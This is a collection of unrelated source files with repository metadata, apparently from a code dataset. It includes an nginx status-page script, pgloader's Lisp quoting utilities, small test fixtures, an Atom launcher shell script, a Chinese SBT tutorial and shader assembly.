aHe('td', [formatAvailability(peer.backup, peer.down), formatTime(peer.responseMsec),
peer.weight, peer.maxFails, peer.failTimeout,
(peer.requestCounter + peer.overCounts['maxIntegerSize'] * peer.overCounts['requestCounter']),
aPs.getValue(`${uniq}.requestCounter`, peer.requestCounter),
formatTime(peer.requestMsec)
]);
for(const code in peer.responses) {
if (peer.responses.hasOwnProperty(code)) {
responseCount = peer.responses[code] + peer.overCounts['maxIntegerSize'] * peer.overCounts[code];
responseTotal += responseCount;
s += aHe('td', responseCount);
}
}
s += aHe('td', [responseTotal,
byteFormat(peer.outBytes + peer.overCounts['maxIntegerSize'] * peer.overCounts['outBytes']),
byteFormat(peer.inBytes + peer.overCounts['maxIntegerSize'] * peer.overCounts['inBytes']),
byteFormat(aPs.getValue(`${uniq}.outBytes`, peer.outBytes)),
byteFormat(aPs.getValue(`${uniq}.inBytes`, peer.inBytes))
]);
o += aHe(`tr class="${clas}"`, s);
}
return o;
}
function templateCacheZone(filter, group, id) {
let n = 0;
let s;
let o = '';
for(const name in filter) {
if (filter.hasOwnProperty(name)) {
const zone = filter[name];
const uniq = `${id}.${group}.${name}`;
let clas = '';
let cacheCount = 0;
let cacheTotal = 0;
clas = (n++ % 2) ? 'odd' : '';
s = aHe('th', name) +
aHe('td', [byteFormat(zone.maxSize),
byteFormat(zone.usedSize),
byteFormat(zone.outBytes + zone.overCounts['maxIntegerSize'] * zone.overCounts['outBytes']),
byteFormat(zone.inBytes + zone.overCounts['maxIntegerSize'] * zone.overCounts['inBytes']),
byteFormat(aPs.getValue(`${uniq}.outBytes`, zone.outBytes)),
byteFormat(aPs.getValue(`${uniq}.inBytes`, zone.inBytes))
]);
for (const code in zone.responses) {
if (zone.responses.hasOwnProperty(code)) {
cacheCount = zone.responses[code] + zone.overCounts['maxIntegerSize'] * zone.overCounts[code];
cacheTotal += cacheCount;
s += aHe('td', cacheCount);
}
}
s += aHe('td', cacheTotal);
o += aHe(`tr class="${clas}"`, s);
}
}
return o;
}
function haveCache(it) {
const key = "*";
if (typeof it.serverZones[key] == "undefined") {
return true;
}
return Object.keys(it.serverZones[key].responses).length > 5;
}
function template(it) {
aPs.refresh(it.nowMsec);
const bodys = [];
let tmp = '';
let out, head, body, cache;
/* main */
out = templateMainZone(it);
/* serverZones */
cache = haveCache(it);
head = templateServerHeader(cache);
bodys[0] = templateServerZone(it.serverZones, 'server', vtsStatusVars.ids.server, cache);
body = aHe('tbody', bodys[0]);
out += aHe(`div id="${vtsStatusVars.ids.server}"`, aHe('h2', vtsStatusVars.titles.server) + aHe('table', head + body));
/* filterZones */
if (vtsStatusVars.ids.filter in it) {
tmp = '';
for (const group in it.filterZones) {
if (it.filterZones.hasOwnProperty(group)) {
const filter = it.filterZones[group];
head = templateServerHeader(cache);
bodys[0] = templateServerZone(filter, group, vtsStatusVars.ids.filter, cache);
body = aHe('tbody', bodys[0]);
tmp += aHe('h3', group) + aHe('table', head + body);
}
}
out += aHe(`div id="${vtsStatusVars.ids.filter}"`, aHe('h2', vtsStatusVars.titles.filter) + tmp);
}
/* upstreamZones */
if (vtsStatusVars.ids.upstream in it) {
tmp = '';
for (let group in it.upstreamZones) {
if (it.upstreamZones.hasOwnProperty(group)) {
const filter = it.upstreamZones[group];
head = templateUpstreamHeader();
bodys[0] = templateUpstreamZone(filter, group, vtsStatusVars.ids.upstream);
body = aHe('tbody', bodys[0]);
let g2 = uc.getByInternalName(group);
if (g2) {
if (g2.get('description')) {
group = g2.get('description');
}
}
tmp += aHe('h3', group) + aHe('table', head + body);
}
}
out += aHe(`div id="${vtsStatusVars.ids.upstream}"`, aHe('h2', vtsStatusVars.titles.upstream) + tmp);
}
/* cacheZones */
if (vtsStatusVars.ids.cache in it) {
head = templateCacheHeader();
bodys[0] = templateCacheZone(it.cacheZones, 'cache', vtsStatusVars.ids.cache);
body = aHe('tbody', bodys[0]);
out += aHe(`div id="${vtsStatusVars.ids.cache}"`,
aHe('h2', vtsStatusVars.titles.cache) + aHe('table', head + body));
}
return out;
}
const monitor = $('#monitor');
function vtsGetData() {
jQuery.get(vtsStatusURI).done(function (d) {
monitor.html(template(d));
});
}
function vtsSetInterval(msec) {
clearInterval(vtsUpdate);
vtsUpdate = setInterval(vtsGetData, msec);
}
$('#refresh').on('change', function () {
vtsSetInterval($(this).val() * 1000);
});
vtsGetData();
vtsSetInterval(vtsUpdateInterval);
</script>
| Volt | 4 | ccesario/plugins | www/nginx/src/opnsense/mvc/app/views/OPNsense/Nginx/vts.volt | [
"BSD-2-Clause"
] |
;;;
;;; Manage PostgreSQL specific quoting of identifiers.
;;;
;;; We use this facility as early as possible (in schema-structs), so we
;;; need those bits of code in utils/ rather than pgsql/.
;;;
(in-package :pgloader.quoting)
(defun apply-identifier-case (identifier)
"Return given IDENTIFIER with CASE handled to be PostgreSQL compatible."
(let* ((lowercase-identifier (cl-ppcre:regex-replace-all
"[^a-zA-Z0-9.]" (string-downcase identifier) "_"))
(*identifier-case*
;; we might need to force to :quote in some cases
;;
;; http://www.postgresql.org/docs/9.1/static/sql-syntax-lexical.html
;;
;; SQL identifiers and key words must begin with a letter (a-z, but
;; also letters with diacritical marks and non-Latin letters) or an
;; underscore (_).
(cond ((quoted-p identifier)
:none)
((not (cl-ppcre:scan "^[A-Za-z_][A-Za-z0-9_$]*$" identifier))
:quote)
((member lowercase-identifier *pgsql-reserved-keywords*
:test #'string=)
(progn
;; we need to both downcase and quote here
(when (eq :downcase *identifier-case*)
(setf identifier lowercase-identifier))
:quote))
;; in other cases follow user directive
(t *identifier-case*))))
(ecase *identifier-case*
(:snake_case (camelCase-to-colname identifier))
(:downcase lowercase-identifier)
(:quote (format nil "~s"
(cl-ppcre:regex-replace-all "\"" identifier "\"\"")))
(:none identifier))))
(defun quoted-p (s &optional (quote-char #\"))
"Return true if s is a double-quoted string"
(or (null s)
(when (< 1 (length s))
(and (eq (char s 0) quote-char)
(eq (char s (- (length s) 1)) quote-char)))))
(defun ensure-unquoted (identifier &optional (quote-char #\"))
(cond ((null identifier) nil)
((< (length identifier) 2) identifier)
((quoted-p identifier quote-char)
;; when the table name comes from the user (e.g. in the
;; load file) then we might have to unquote it: the
;; PostgreSQL catalogs does not store object names in
;; their quoted form.
(subseq identifier 1 (1- (length identifier))))
(t identifier)))
(defun ensure-quoted (value &optional (quote-char #\"))
(if (quoted-p value quote-char)
value
(format nil "~c~a~c" quote-char value quote-char)))
(defun build-identifier (sep &rest parts)
"Concatenante PARTS into a PostgreSQL identifier, with SEP in between
parts. That's useful for creating an index name from a table's oid and name."
(apply-identifier-case
(apply #'concatenate
'string
(loop :for (part . more?) :on parts
:collect (ensure-unquoted (typecase part
(string part)
(t (princ-to-string part))))
:when more? :collect sep))))
;;;
;;; Camel Case converter
;;;
(defun camelCase-to-colname (string)
"Transform input STRING into a suitable column name.
lahmanID lahman_id
playerID player_id
birthYear birth_year"
(coerce
(loop
:for first := t :then nil
:for char :across string
:for previous-upper-p := nil :then char-upper-p
:for char-upper-p := (and (alpha-char-p char)
(eq char (char-upcase char)))
:for new-word := (and (not first) char-upper-p (not previous-upper-p))
:when (and new-word (not (char= char #\_))) :collect #\_
:collect (char-downcase char))
'string))
| Common Lisp | 5 | eveoh/pgloader | src/utils/quoting.lisp | [
"PostgreSQL"
] |
very multiObj is obj
test: ['wow']
wow
| Dogescript | 0 | erinkeith/dogescript | test/spec/var/very-obj-singleprop/source.djs | [
"MIT"
] |
# Triple, no DOT, operator
PREFIX : <http://example.org/ns#>
SELECT *
{ :p :q :r OPTIONAL { :a :b :c } }
| SPARQL | 3 | alpano-unibz/ontop | test/sparql-compliance/src/test/resources/testcases-dawg/data-r2/syntax-sparql1/syntax-struct-03.rq | [
"Apache-2.0"
] |
#!/bin/bash
# This script wraps the `Atom` binary, allowing the `chromedriver` server to
# execute it with positional arguments and environment variables. `chromedriver`
# only allows 'switches' to be specified when starting a browser, not positional
# arguments, so this script accepts the following special switches:
#
# * `atom-path`: The path to the `Atom` binary.
# * `atom-args`: A space-separated list of positional arguments to pass to Atom.
# * `atom-env`: A space-separated list of key=value pairs representing environment
# variables to set for Atom.
#
# Any other switches will be passed through to `Atom`.
atom_path=""
atom_switches=()
atom_args=()
for arg in "$@"; do
case $arg in
--atom-path=*)
atom_path="${arg#*=}"
;;
--atom-args=*)
atom_arg_string="${arg#*=}"
for atom_arg in $atom_arg_string; do
atom_args+=($atom_arg)
done
;;
--atom-env=*)
atom_env_string="${arg#*=}"
for atom_env_pair in $atom_env_string; do
export $atom_env_pair
done
;;
*)
atom_switches+=($arg)
;;
esac
done
echo "Launching Atom" >&2
echo "${atom_path}" ${atom_args[@]} ${atom_switches[@]} >&2
exec "${atom_path}" ${atom_args[@]} ${atom_switches[@]}
| Shell | 4 | pyrolabs/atom | spec/integration/helpers/atom-launcher.sh | [
"MIT"
] |
# RUN: llc -o - %s -mtriple=amdgcn--amdhsa -verify-machineinstrs -run-pass=greedy,virtregrewriter | FileCheck %s
--- |
define amdgpu_kernel void @func0() {
ret void
}
...
---
# We should not detect any interference between v0/v1 here and only allocate
# sgpr0-sgpr3.
#
# CHECK-LABEL: func0
# CHECK: S_NOP 0, implicit-def renamable $sgpr0
# CHECK: S_NOP 0, implicit-def renamable $sgpr3
# CHECK: S_NOP 0, implicit-def renamable $sgpr1
# CHECK: S_NOP 0, implicit-def renamable $sgpr2
# CHECK: S_NOP 0, implicit renamable $sgpr0, implicit renamable $sgpr3
# CHECK: S_NOP 0, implicit renamable $sgpr1, implicit renamable $sgpr2
name: func0
body: |
bb.0:
S_NOP 0, implicit-def undef %0.sub0 : sgpr_128
S_NOP 0, implicit-def %0.sub3
S_NOP 0, implicit-def undef %1.sub1 : sgpr_128
S_NOP 0, implicit-def %1.sub2
S_NOP 0, implicit %0.sub0, implicit %0.sub3
S_NOP 0, implicit %1.sub1, implicit %1.sub2
...
| Mirah | 3 | medismailben/llvm-project | llvm/test/CodeGen/AMDGPU/subreg_interference.mir | [
"Apache-2.0"
] |
a { value: '\1' } | CSS | 0 | kitsonk/swc | css/parser/tests/fixture/esbuild/misc/GI1rffTXev-78n9ei_53wQ/input.css | [
"Apache-2.0",
"MIT"
] |
---
prev: advanced-types.textile
next: coll2.textile
title: 简单构建工具
layout: post
---
这堂课将概述SBT!具体议题包括:
* 创建一个SBT项目
* 基本命令
* sbt控制台
* 连续命令执行
* 自定义你的项目
* 自定义命令
* 快速浏览SBT资源(如果时间允许)
h2. 关于SBT
SBT是一个现代化的构建工具。虽然它由Scala编写并提供了很多Scala便利,但它是一个通用的构建工具。
h2. 为什么选择SBT?
* 明智的依赖管理
** 使用Ivy做依赖管理
** “只在请求时更新”的模型
* 对创建任务全面的Scala语言支持
* 连续执行命令
* 在项目上下文内启动解释器
h2. 入门
*译注* 最新的SBT安装方式请参考 <a href="https://www.scala-sbt.org/release/docs/Getting-Started/Setup.html">scala-sbt的文档</a>
* 下载jar包 <a href="https://code.google.com/p/simple-build-tool/downloads/list">地址 </a>
* 创建一个调用这个jar的SBT shell脚本,例如
<pre>
java -Xmx512M -jar sbt-launch.jar "$@"
</pre>
* 确保它是可执行的,并在你的path下
* 运行sbt来创建项目
<pre>
[local ~/projects]$ sbt
Project does not exist, create new project? (y/N/s) y
Name: sample
Organization: com.twitter
Version [1.0]: 1.0-SNAPSHOT
Scala version [2.7.7]: 2.8.1
sbt version [0.7.4]:
Getting Scala 2.7.7 ...
:: retrieving :: org.scala-tools.sbt#boot-scala
confs: [default]
2 artifacts copied, 0 already retrieved (9911kB/221ms)
Getting org.scala-tools.sbt sbt_2.7.7 0.7.4 ...
:: retrieving :: org.scala-tools.sbt#boot-app
confs: [default]
15 artifacts copied, 0 already retrieved (4096kB/167ms)
[success] Successfully initialized directory structure.
Getting Scala 2.8.1 ...
:: retrieving :: org.scala-tools.sbt#boot-scala
confs: [default]
2 artifacts copied, 0 already retrieved (15118kB/386ms)
[info] Building project sample 1.0-SNAPSHOT against Scala 2.8.1
[info] using sbt.DefaultProject with sbt 0.7.4 and Scala 2.7.7
>
</pre>
可以看到它已经以较好的形式创建了项目的快照版本。
h2. 项目布局
* 项目 - 项目定义文件
** project/build/<yourproject>.scala - 主项目定义文件
** project/build.properties - 项目、sbt和Scala版本定义
* src/main - 你的应用程序代码出现在这里,在子目录表明代码的语言(如src/main/scala, src/main/java)
* src/main/resources - 你想要添加到jar包中的静态文件(如日志配置)
* src/test - 就像src/main,不过是对测试
* lib_managed - 你的项目依赖的jar文件。由sbt update时填充
* target - 生成物的目标路径(如自动生成的thrift代码,类文件,jar包)
h2. 添加一些代码
我们将为简单的tweet消息创建一个简单的JSON解析器。将以下代码加在这个文件中
src/main/scala/com/twitter/sample/SimpleParser.scala
<pre>
package com.twitter.sample
case class SimpleParsed(id: Long, text: String)
class SimpleParser {
val tweetRegex = "\"id\":(.*),\"text\":\"(.*)\"".r
def parse(str: String) = {
tweetRegex.findFirstMatchIn(str) match {
case Some(m) => {
val id = str.substring(m.start(1), m.end(1)).toInt
val text = str.substring(m.start(2), m.end(2))
Some(SimpleParsed(id, text))
}
case _ => None
}
}
}
</pre>
这段代码丑陋并有bug,但应该能够编译通过。
h2. 在控制台中的测试
SBT既可以用作命令行脚本,也可以作为构建控制台。我们将主要利用它作为构建控制台,不过大多数命令可以作为参数传递给SBT独立运行,如
<pre>
sbt test
</pre>
需要注意如果一个命令需要参数,你需要使用引号包括住整个参数路径,例如
<pre>
sbt 'test-only com.twitter.sample.SampleSpec'
</pre>
这种方式很奇怪。
不管怎样,要开始我们的代码工作了,启动SBT吧
<pre>
[local ~/projects/sbt-sample]$ sbt
[info] Building project sample 1.0-SNAPSHOT against Scala 2.8.1
[info] using sbt.DefaultProject with sbt 0.7.4 and Scala 2.7.7
>
</pre>
SBT允许你启动一个Scala REPL并加载所有项目依赖。它会在启动控制台前编译项目的源代码,从而为我们提供一个快速测试解析器的工作台。
<pre>
> console
[info]
[info] == compile ==
[info] Source analysis: 0 new/modified, 0 indirectly invalidated, 0 removed.
[info] Compiling main sources...
[info] Nothing to compile.
[info] Post-analysis: 3 classes.
[info] == compile ==
[info]
[info] == copy-test-resources ==
[info] == copy-test-resources ==
[info]
[info] == test-compile ==
[info] Source analysis: 0 new/modified, 0 indirectly invalidated, 0 removed.
[info] Compiling test sources...
[info] Nothing to compile.
[info] Post-analysis: 0 classes.
[info] == test-compile ==
[info]
[info] == copy-resources ==
[info] == copy-resources ==
[info]
[info] == console ==
[info] Starting scala interpreter...
[info]
Welcome to Scala version 2.8.1.final (Java HotSpot(TM) 64-Bit Server VM, Java 1.6.0_22).
Type in expressions to have them evaluated.
Type :help for more information.
scala>
</pre>
我们代码编译通过了,并提供了典型的Scala提示符。我们将创建一个新的解析器,一个tweet以确保其“能工作”
<pre>
scala> import com.twitter.sample._
import com.twitter.sample._
scala> val tweet = """{"id":1,"text":"foo"}"""
tweet: java.lang.String = {"id":1,"text":"foo"}
scala> val parser = new SimpleParser
parser: com.twitter.sample.SimpleParser = com.twitter.sample.SimpleParser@71060c3e
scala> parser.parse(tweet)
res0: Option[com.twitter.sample.SimpleParsed] = Some(SimpleParsed(1,"foo"))
scala>
</pre>
h2. 添加依赖
我们简单的解析器对这个非常小的输入集工作正常,但我们需要添加更多的测试并让它出错。第一步是在我们的项目中添加specs测试库和一个真正的JSON解析器。要做到这一点,我们必须超越默认的SBT项目布局来创建一个项目。
SBT认为project/build目录中的Scala文件是项目定义。添加以下内容到这个文件中project/build/SampleProject.scala
<pre>
import sbt._
class SampleProject(info: ProjectInfo) extends DefaultProject(info) {
val jackson = "org.codehaus.jackson" % "jackson-core-asl" % "1.6.1"
val specs = "org.scala-tools.testing" % "specs_2.8.0" % "1.6.5" % "test"
}
</pre>
一个项目定义是一个SBT类。在上面例子中,我们扩展了SBT的DefaultProject。
这里是通过val声明依赖。SBT使用反射来扫描项目中的所有val依赖,并在构建时建立依赖关系树。这里使用的语法可能是新的,但本质和Maven依赖是相同的
<pre>
<dependency>
<groupId>org.codehaus.jackson</groupId>
<artifactId>jackson-core-asl</artifactId>
<version>1.6.1</version>
</dependency>
<dependency>
<groupId>org.scala-tools.testing</groupId>
<artifactId>specs_2.8.0</artifactId>
<version>1.6.5</version>
<scope>test</scope>
</dependency>
</pre>
现在可以下载我们的项目依赖了。在命令行中(而不是sbt console中)运行sbt update
<pre>
[local ~/projects/sbt-sample]$ sbt update
[info] Building project sample 1.0-SNAPSHOT against Scala 2.8.1
[info] using SampleProject with sbt 0.7.4 and Scala 2.7.7
[info]
[info] == update ==
[info] :: retrieving :: com.twitter#sample_2.8.1 [sync]
[info] confs: [compile, runtime, test, provided, system, optional, sources, javadoc]
[info] 1 artifacts copied, 0 already retrieved (2785kB/71ms)
[info] == update ==
[success] Successful.
[info]
[info] Total time: 1 s, completed Nov 24, 2010 8:47:26 AM
[info]
[info] Total session time: 2 s, completed Nov 24, 2010 8:47:26 AM
[success] Build completed successfully.
</pre>
你会看到sbt检索到specs库。现在还增加了一个lib_managed目录,并且在lib_managed/scala_2.8.1/test目录中包含 specs_2.8.0-1.6.5.jar
h2. 添加测试
现在有了测试库,可以把下面的测试代码写入src/test/scala/com/twitter/sample/SimpleParserSpec.scala文件
<pre>
package com.twitter.sample
import org.specs._
object SimpleParserSpec extends Specification {
"SimpleParser" should {
val parser = new SimpleParser()
"work with basic tweet" in {
val tweet = """{"id":1,"text":"foo"}"""
parser.parse(tweet) match {
case Some(parsed) => {
parsed.text must be_==("foo")
parsed.id must be_==(1)
}
case _ => fail("didn't parse tweet")
}
}
}
}
</pre>
在SBT控制台中运行test
<pre>
> test
[info]
[info] == compile ==
[info] Source analysis: 0 new/modified, 0 indirectly invalidated, 0 removed.
[info] Compiling main sources...
[info] Nothing to compile.
[info] Post-analysis: 3 classes.
[info] == compile ==
[info]
[info] == test-compile ==
[info] Source analysis: 0 new/modified, 0 indirectly invalidated, 0 removed.
[info] Compiling test sources...
[info] Nothing to compile.
[info] Post-analysis: 10 classes.
[info] == test-compile ==
[info]
[info] == copy-test-resources ==
[info] == copy-test-resources ==
[info]
[info] == copy-resources ==
[info] == copy-resources ==
[info]
[info] == test-start ==
[info] == test-start ==
[info]
[info] == com.twitter.sample.SimpleParserSpec ==
[info] SimpleParserSpec
[info] SimpleParser should
[info] + work with basic tweet
[info] == com.twitter.sample.SimpleParserSpec ==
[info]
[info] == test-complete ==
[info] == test-complete ==
[info]
[info] == test-finish ==
[info] Passed: : Total 1, Failed 0, Errors 0, Passed 1, Skipped 0
[info]
[info] All tests PASSED.
[info] == test-finish ==
[info]
[info] == test-cleanup ==
[info] == test-cleanup ==
[info]
[info] == test ==
[info] == test ==
[success] Successful.
[info]
[info] Total time: 0 s, completed Nov 24, 2010 8:54:45 AM
>
</pre>
我们的测试通过了!现在,我们可以增加更多。运行触发动作是SBT提供的优秀特性之一。在动作开始添加一个波浪线会启动一个循环,在源文件发生变化时重新运行动作。让我们运行 ~test 并看看会发生什么吧。
<pre>
[info] == test ==
[success] Successful.
[info]
[info] Total time: 0 s, completed Nov 24, 2010 8:55:50 AM
1. Waiting for source changes... (press enter to interrupt)
</pre>
现在,让我们添加下面的测试案例
<pre>
"reject a non-JSON tweet" in {
val tweet = """"id":1,"text":"foo""""
parser.parse(tweet) match {
case Some(parsed) => fail("didn't reject a non-JSON tweet")
case e => e must be_==(None)
}
}
"ignore nested content" in {
val tweet = """{"id":1,"text":"foo","nested":{"id":2}}"""
parser.parse(tweet) match {
case Some(parsed) => {
parsed.text must be_==("foo")
parsed.id must be_==(1)
}
case _ => fail("didn't parse tweet")
}
}
"fail on partial content" in {
val tweet = """{"id":1}"""
parser.parse(tweet) match {
case Some(parsed) => fail("didn't reject a partial tweet")
case e => e must be_==(None)
}
}
</pre>
在我们保存文件后,SBT会检测到变化,运行测试,并通知我们的解析器有问题
<pre>
[info] == com.twitter.sample.SimpleParserSpec ==
[info] SimpleParserSpec
[info] SimpleParser should
[info] + work with basic tweet
[info] x reject a non-JSON tweet
[info] didn't reject a non-JSON tweet (Specification.scala:43)
[info] x ignore nested content
[info] 'foo","nested":{"id' is not equal to 'foo' (SimpleParserSpec.scala:31)
[info] + fail on partial content
</pre>
因此,让我们返工实现真正的JSON解析器
<pre>
package com.twitter.sample
import org.codehaus.jackson._
import org.codehaus.jackson.JsonToken._
case class SimpleParsed(id: Long, text: String)
class SimpleParser {
val parserFactory = new JsonFactory()
def parse(str: String) = {
val parser = parserFactory.createJsonParser(str)
if (parser.nextToken() == START_OBJECT) {
var token = parser.nextToken()
var textOpt:Option[String] = None
var idOpt:Option[Long] = None
while(token != null) {
if (token == FIELD_NAME) {
parser.getCurrentName() match {
case "text" => {
parser.nextToken()
textOpt = Some(parser.getText())
}
case "id" => {
parser.nextToken()
idOpt = Some(parser.getLongValue())
}
case _ => // noop
}
}
token = parser.nextToken()
}
if (textOpt.isDefined && idOpt.isDefined) {
Some(SimpleParsed(idOpt.get, textOpt.get))
} else {
None
}
} else {
None
}
}
}
</pre>
这是一个简单的Jackson解析器。当我们保存,SBT会重新编译代码和运行测试。代码变得越来越好了!
<pre>
info] SimpleParser should
[info] + work with basic tweet
[info] + reject a non-JSON tweet
[info] x ignore nested content
[info] '2' is not equal to '1' (SimpleParserSpec.scala:32)
[info] + fail on partial content
[info] == com.twitter.sample.SimpleParserSpec ==
</pre>
哦。我们需要检查嵌套对象。让我们在token读取循环处添加一些丑陋的守卫。
<pre>
def parse(str: String) = {
val parser = parserFactory.createJsonParser(str)
var nested = 0
if (parser.nextToken() == START_OBJECT) {
var token = parser.nextToken()
var textOpt:Option[String] = None
var idOpt:Option[Long] = None
while(token != null) {
if (token == FIELD_NAME && nested == 0) {
parser.getCurrentName() match {
case "text" => {
parser.nextToken()
textOpt = Some(parser.getText())
}
case "id" => {
parser.nextToken()
idOpt = Some(parser.getLongValue())
}
case _ => // noop
}
} else if (token == START_OBJECT) {
nested += 1
} else if (token == END_OBJECT) {
nested -= 1
}
token = parser.nextToken()
}
if (textOpt.isDefined && idOpt.isDefined) {
Some(SimpleParsed(idOpt.get, textOpt.get))
} else {
None
}
} else {
None
}
}
</pre>
...测试通过了!
h2. 打包和发布
现在我们已经可以运行package命令来生成一个jar文件。不过我们可能要与其他组分享我们的jar包。要做到这一点,我们将在StandardProject基础上构建,这给了我们一个良好的开端。
第一步是引入StandardProject为SBT插件。插件是一种为你的构建引进依赖的方式,注意不是为你的项目引入。这些依赖关系定义在project/plugins/Plugins.scala文件中。添加以下代码到Plugins.scala文件中。
<pre>
import sbt._
class Plugins(info: ProjectInfo) extends PluginDefinition(info) {
val twitterMaven = "twitter.com" at "https://maven.twttr.com/"
val defaultProject = "com.twitter" % "standard-project" % "0.7.14"
}
</pre>
注意我们指定了一个Maven仓库和一个依赖。这是因为这个标准项目库是由twitter托管的,不在SBT默认检查的仓库中。
我们也将更新项目定义来扩展StandardProject,包括SVN发布特质,和我们希望发布的仓库定义。修改SampleProject.scala
<pre>
import sbt._
import com.twitter.sbt._
class SampleProject(info: ProjectInfo) extends StandardProject(info) with SubversionPublisher {
val jackson = "org.codehaus.jackson" % "jackson-core-asl" % "1.6.1"
val specs = "org.scala-tools.testing" % "specs_2.8.0" % "1.6.5" % "test"
override def subversionRepository = Some("https://svn.local.twitter.com/maven/")
}
</pre>
现在如果我们运行发布操作,将看到以下输出
<pre>
[info] == deliver ==
IvySvn Build-Version: null
IvySvn Build-DateTime: null
[info] :: delivering :: com.twitter#sample;1.0-SNAPSHOT :: 1.0-SNAPSHOT :: release :: Wed Nov 24 10:26:45 PST 2010
[info] delivering ivy file to /Users/mmcbride/projects/sbt-sample/target/ivy-1.0-SNAPSHOT.xml
[info] == deliver ==
[info]
[info] == make-pom ==
[info] Wrote /Users/mmcbride/projects/sbt-sample/target/sample-1.0-SNAPSHOT.pom
[info] == make-pom ==
[info]
[info] == publish ==
[info] :: publishing :: com.twitter#sample
[info] Scheduling publish to https://svn.local.twitter.com/maven/com/twitter/sample/1.0-SNAPSHOT/sample-1.0-SNAPSHOT.jar
[info] published sample to com/twitter/sample/1.0-SNAPSHOT/sample-1.0-SNAPSHOT.jar
[info] Scheduling publish to https://svn.local.twitter.com/maven/com/twitter/sample/1.0-SNAPSHOT/sample-1.0-SNAPSHOT.pom
[info] published sample to com/twitter/sample/1.0-SNAPSHOT/sample-1.0-SNAPSHOT.pom
[info] Scheduling publish to https://svn.local.twitter.com/maven/com/twitter/sample/1.0-SNAPSHOT/ivy-1.0-SNAPSHOT.xml
[info] published ivy to com/twitter/sample/1.0-SNAPSHOT/ivy-1.0-SNAPSHOT.xml
[info] Binary diff deleting com/twitter/sample/1.0-SNAPSHOT
[info] Commit finished r977 by 'mmcbride' at Wed Nov 24 10:26:47 PST 2010
[info] Copying from com/twitter/sample/.upload to com/twitter/sample/1.0-SNAPSHOT
[info] Binary diff finished : r978 by 'mmcbride' at Wed Nov 24 10:26:47 PST 2010
[info] == publish ==
[success] Successful.
[info]
[info] Total time: 4 s, completed Nov 24, 2010 10:26:47 AM
</pre>
这样(一段时间后),就可以在 <a href="https://binaries.local.twitter.com/maven/com/twitter/sample/1.0-SNAPSHOT/">binaries.local.twitter.com</a> 上看到我们发布的jar包。
h2. 添加任务
任务就是Scala函数。添加一个任务最简单的方法是,在你的项目定义中引入一个val定义的任务方法,如
<pre>
lazy val print = task {log.info("a test action"); None}
</pre>
你也可以这样加上依赖和描述
<pre>
lazy val print = task {log.info("a test action"); None}.dependsOn(compile) describedAs("prints a line after compile")
</pre>
刷新项目,并执行print操作,我们将看到以下输出
<pre>
> print
[info]
[info] == print ==
[info] a test action
[info] == print ==
[success] Successful.
[info]
[info] Total time: 0 s, completed Nov 24, 2010 11:05:12 AM
>
</pre>
所以它起作用了。如果你只是在一个项目定义一个任务的话,这工作得很好。然而如果你定义的是一个插件的话,它就很不灵活了。我可能要
<pre>
lazy val print = printAction
def printAction = printTask.dependsOn(compile) describedAs("prints a line after compile")
def printTask = task {log.info("a test action"); None}
</pre>
这可以让消费者覆盖任务本身,依赖和/或任务的描述,或动作本身。大多数SBT内建的动作都遵循这种模式。作为一个例子,我们可以通过修改内置打包任务来打印当前时间戳
<pre>
lazy val printTimestamp = task { log.info("current time is " + System.currentTimeMillis); None}
override def packageAction = super.packageAction.dependsOn(printTimestamp)
</pre>
有很多例子介绍了怎样调整SBT默认的StandardProject,和如何添加自定义任务。
h2. 快速参考
h3. 常用命令
* actions - 显示这个项目中可用的动作
* update - 下载依赖
* compile - 编译源文件
* test - 运行测试
* package - 创建一个可发布的jar文件
* publish-local - 在本地ivy缓存中安装构建好的jar包
* publish - 将你的jar推到一个远程库中(如果配置了的话)
h3. 更多命令
* test-failed - 运行所有失败的规格测试
* test-quick - 运行任何失败的和/或依赖更新的规格
* clean-cache - 删除SBT缓存各种的东西。就像sbt的clean命令
* clean-lib - 删除lib_managed下的一切
h3. 项目布局
待续
| Textile | 5 | AstronomiaDev/scala_school | web/zh_cn/sbt.textile | [
"Apache-2.0"
] |
/*
* Copyright (c) 2020, Andreas Kling <kling@serenityos.org>
*
* SPDX-License-Identifier: BSD-2-Clause
*/
#include "Gradient.h"
#include <LibGUI/Painter.h>
namespace Profiler {
static Gfx::Bitmap const& heat_gradient()
{
static RefPtr<Gfx::Bitmap> bitmap;
if (!bitmap) {
bitmap = Gfx::Bitmap::try_create(Gfx::BitmapFormat::BGRx8888, { 101, 1 }).release_value_but_fixme_should_propagate_errors();
GUI::Painter painter(*bitmap);
painter.fill_rect_with_gradient(Orientation::Horizontal, bitmap->rect(), Color::from_rgb(0xffc080), Color::from_rgb(0xff3000));
}
return *bitmap;
}
Color color_for_percent(u8 percent)
{
VERIFY(percent <= 100);
return heat_gradient().get_pixel(percent, 0);
}
}
| C++ | 4 | densogiaichned/serenity | Userland/DevTools/Profiler/Gradient.cpp | [
"BSD-2-Clause"
] |
.root
&:not(:last-child):not(:last-of-type)
margin-bottom: var(--spacing-md)
padding-bottom: var(--spacing-md)
border-bottom: 1px dotted var(--color-subtle)
.hr
border: 0
padding: var(--spacing-sm) 0
| Sass | 2 | snosrap/spaCy | website/src/styles/section.module.sass | [
"MIT"
] |
; SPIR-V
; Version: 1.0
; Generator: Khronos Glslang Reference Front End; 7
; Bound: 35
; Schema: 0
OpCapability Shader
%1 = OpExtInstImport "GLSL.std.450"
OpMemoryModel Logical GLSL450
OpEntryPoint Fragment %main "main" %FragColor
OpExecutionMode %main OriginUpperLeft
OpSource GLSL 450
OpName %main "main"
OpName %foo "foo"
OpName %FragColor "FragColor"
OpDecorate %FragColor Location 0
%void = OpTypeVoid
%3 = OpTypeFunction %void
%float = OpTypeFloat 32
%_ptr_Function_float = OpTypePointer Function %float
%float_1 = OpConstant %float 1
%float_2 = OpConstant %float 2
%bool = OpTypeBool
%false = OpConstantFalse %bool
%float_3 = OpConstant %float 3
%float_4 = OpConstant %float 4
%float_5 = OpConstant %float 5
%_ptr_Output_float = OpTypePointer Output %float
%FragColor = OpVariable %_ptr_Output_float Output
%main = OpFunction %void None %3
%5 = OpLabel
%foo = OpVariable %_ptr_Function_float Function
OpStore %foo %float_1
OpBranch %10
%10 = OpLabel
OpLoopMerge %12 %13 None
OpBranch %11
%11 = OpLabel
OpBranch %13
%13 = OpLabel
OpStore %foo %float_2
OpBranchConditional %false %10 %12
%12 = OpLabel
OpBranch %17
%17 = OpLabel
OpLoopMerge %19 %20 None
OpBranch %18
%18 = OpLabel
OpBranch %20
%20 = OpLabel
OpStore %foo %float_3
OpBranchConditional %false %17 %19
%19 = OpLabel
OpBranch %22
%22 = OpLabel
OpLoopMerge %24 %25 None
OpBranch %23
%23 = OpLabel
OpBranch %25
%25 = OpLabel
